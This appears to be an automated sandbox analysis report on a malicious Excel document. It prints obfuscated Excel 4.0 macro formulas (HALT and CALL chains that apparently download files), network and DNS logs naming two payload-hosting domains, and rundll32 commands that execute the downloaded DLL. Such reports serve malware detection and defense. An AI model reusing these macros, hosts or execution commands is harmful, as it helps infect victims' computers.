,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                                                                                      ,,,=HALT(),,,,,,,,,,,,"=4984654+9846544+468464=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT114,before.3.21.42.sheet!AT39,0,0)=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT115,before.3.21.42.sheet!AT39&""1"",0,0)",,,,,,,,,,,,,,,=Sheet2!AW142(),,,,,,,,,,,,,,,,,,,,,U,J,",D",..\jordji.nbvt1R,J,l,L,C,l,D,C,R,o,B,e,w,B,g,n,,i,l,,s,o,,t,a,,e,d,0,r,T,,S,o,,e,F,,r,i,,ve,l,,r,e,,,

                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      May 4, 2021 13:48:14.257014990 CEST49733443192.168.2.4192.254.233.89
                                                                                                                                                                                                                      May 4, 2021 13:48:14.444928885 CEST44349733192.254.233.89192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:14.445097923 CEST49733443192.168.2.4192.254.233.89
                                                                                                                                                                                                                      May 4, 2021 13:48:14.446371078 CEST49733443192.168.2.4192.254.233.89
                                                                                                                                                                                                                      May 4, 2021 13:48:14.631352901 CEST44349733192.254.233.89192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:14.633671045 CEST44349733192.254.233.89192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:14.633702040 CEST44349733192.254.233.89192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:14.633714914 CEST44349733192.254.233.89192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:14.633804083 CEST49733443192.168.2.4192.254.233.89
                                                                                                                                                                                                                      May 4, 2021 13:48:14.633872032 CEST49733443192.168.2.4192.254.233.89
                                                                                                                                                                                                                      May 4, 2021 13:48:14.649595022 CEST49733443192.168.2.4192.254.233.89
                                                                                                                                                                                                                      May 4, 2021 13:48:14.834837914 CEST44349733192.254.233.89192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:14.835059881 CEST49733443192.168.2.4192.254.233.89
                                                                                                                                                                                                                      May 4, 2021 13:48:14.836025953 CEST49733443192.168.2.4192.254.233.89
                                                                                                                                                                                                                      May 4, 2021 13:48:15.061564922 CEST44349733192.254.233.89192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:15.377037048 CEST44349733192.254.233.89192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:15.377131939 CEST44349733192.254.233.89192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:15.377212048 CEST49733443192.168.2.4192.254.233.89
                                                                                                                                                                                                                      May 4, 2021 13:48:15.377254009 CEST49733443192.168.2.4192.254.233.89
                                                                                                                                                                                                                      May 4, 2021 13:48:15.378879070 CEST49733443192.168.2.4192.254.233.89
                                                                                                                                                                                                                      May 4, 2021 13:48:15.563834906 CEST44349733192.254.233.89192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:15.588709116 CEST49735443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:15.754623890 CEST44349735192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:15.754754066 CEST49735443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:15.755526066 CEST49735443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:15.918543100 CEST44349735192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:15.922480106 CEST44349735192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:15.922509909 CEST44349735192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:15.922522068 CEST44349735192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:15.922585011 CEST49735443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:15.922616959 CEST49735443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:15.932720900 CEST49735443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:16.097321987 CEST44349735192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:16.097404957 CEST49735443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:16.098273039 CEST49735443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:16.270678043 CEST44349735192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:16.270709038 CEST44349735192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:16.270757914 CEST49735443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:16.270795107 CEST49735443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:16.271794081 CEST49735443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:16.274843931 CEST49737443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:16.438380003 CEST44349735192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:16.443665981 CEST44349737192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:16.443876028 CEST49737443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:16.444403887 CEST49737443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:16.607947111 CEST44349737192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:16.607979059 CEST44349737192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:16.608069897 CEST49737443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:16.608534098 CEST49737443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:16.611798048 CEST49737443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:16.811655998 CEST44349737192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:17.019692898 CEST44349737192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:17.019860029 CEST49737443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:17.024372101 CEST44349737192.185.5.2192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:17.024519920 CEST49737443192.168.2.4192.185.5.2
                                                                                                                                                                                                                      May 4, 2021 13:48:47.024405956 CEST44349737192.185.5.2192.168.2.4

                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      May 4, 2021 13:47:57.192547083 CEST5912353192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:47:57.270159960 CEST53591238.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:47:57.678992033 CEST5453153192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:47:57.727607012 CEST53545318.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:47:59.123368025 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:47:59.172077894 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:47:59.897991896 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:47:59.946611881 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:00.990794897 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:01.039391041 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:02.857693911 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:02.907594919 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:03.722920895 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:03.781227112 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:08.367686033 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:08.421118975 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:09.534018993 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:09.606618881 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:10.035633087 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:10.105541945 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:10.380309105 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:10.429222107 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:11.069331884 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:11.140590906 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:12.099386930 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:12.159229040 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:12.888755083 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:12.940485954 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:14.072832108 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:14.109349966 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:14.169013023 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:14.252398014 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:14.254153967 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:14.304167986 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:15.396091938 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:15.563476086 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:15.586093903 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:15.612308025 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:17.398664951 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:17.451520920 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:18.131697893 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:18.190745115 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:18.803430080 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:18.855869055 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:21.871052980 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:21.920531034 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:22.994800091 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:23.053308010 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:23.995692015 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:24.044250011 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:25.350069046 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:25.398540974 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:26.490278006 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:26.541841030 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:28.094836950 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:28.146389008 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:29.182952881 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:29.240228891 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:32.561445951 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:32.610258102 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:33.048775911 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:33.097503901 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:33.814681053 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:33.868495941 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:41.153635025 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:41.216614962 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:50.793153048 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:50.860055923 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:57.906140089 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:58.061760902 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:58.710150957 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:58.767055988 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:59.328826904 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:59.493369102 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:59.944622993 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:00.002288103 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:00.469000101 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:00.535358906 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:00.543842077 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:00.592427015 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:01.137968063 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:01.295217037 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:01.751941919 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:01.809473991 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:02.566049099 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:02.623294115 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:03.418185949 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:03.475552082 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:03.934693098 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:03.988012075 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:16.954533100 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:17.016158104 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:59.038494110 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:59.091358900 CEST53642068.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:50:00.682821989 CEST5090453192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:50:00.747786045 CEST53509048.8.8.8192.168.2.4

                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                      May 4, 2021 13:48:14.072832108 CEST192.168.2.48.8.8.80x5fc1Standard query (0)industrialarttextile.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                      May 4, 2021 13:48:15.396091938 CEST192.168.2.48.8.8.80xbe1bStandard query (0)anaheimdermatologists.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                      May 4, 2021 13:48:14.254153967 CEST8.8.8.8192.168.2.40x5fc1No error (0)industrialarttextile.com192.254.233.89A (IP address)IN (0x0001)
                                                                                                                                                                                                                      May 4, 2021 13:48:15.586093903 CEST8.8.8.8192.168.2.40xbe1bNo error (0)anaheimdermatologists.com192.185.5.2A (IP address)IN (0x0001)

                                                                                                                                                                                                                      HTTPS Packets

                                                                                                                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                      May 4, 2021 13:48:14.633714914 CEST192.254.233.89443192.168.2.449733CN=mail.gdmart.com.bd CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 10 10:47:11 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 08 11:47:11 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                                                      May 4, 2021 13:48:15.922522068 CEST192.185.5.2443192.168.2.449735CN=cpcalendars.anaheimdermatologists.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 17 22:18:32 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 15 23:18:32 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                                                                      Code Manipulations

                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Start time:13:48:07
                                                                                                                                                                                                                      Start date:04/05/2021
                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                      Imagebase:0x100000
                                                                                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Start time:13:48:16
                                                                                                                                                                                                                      Start date:04/05/2021
                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:rundll32 ..\jordji.nbvt1,DllRegisterServer
                                                                                                                                                                                                                      Imagebase:0xb0000
                                                                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Start time:13:48:16
                                                                                                                                                                                                                      Start date:04/05/2021
                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:rundll32 ..\jordji.nbvt11,DllRegisterServer
                                                                                                                                                                                                                      Imagebase:0xb0000
                                                                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                      Code Analysis

                                                                                                                                                                                                                      Reset < >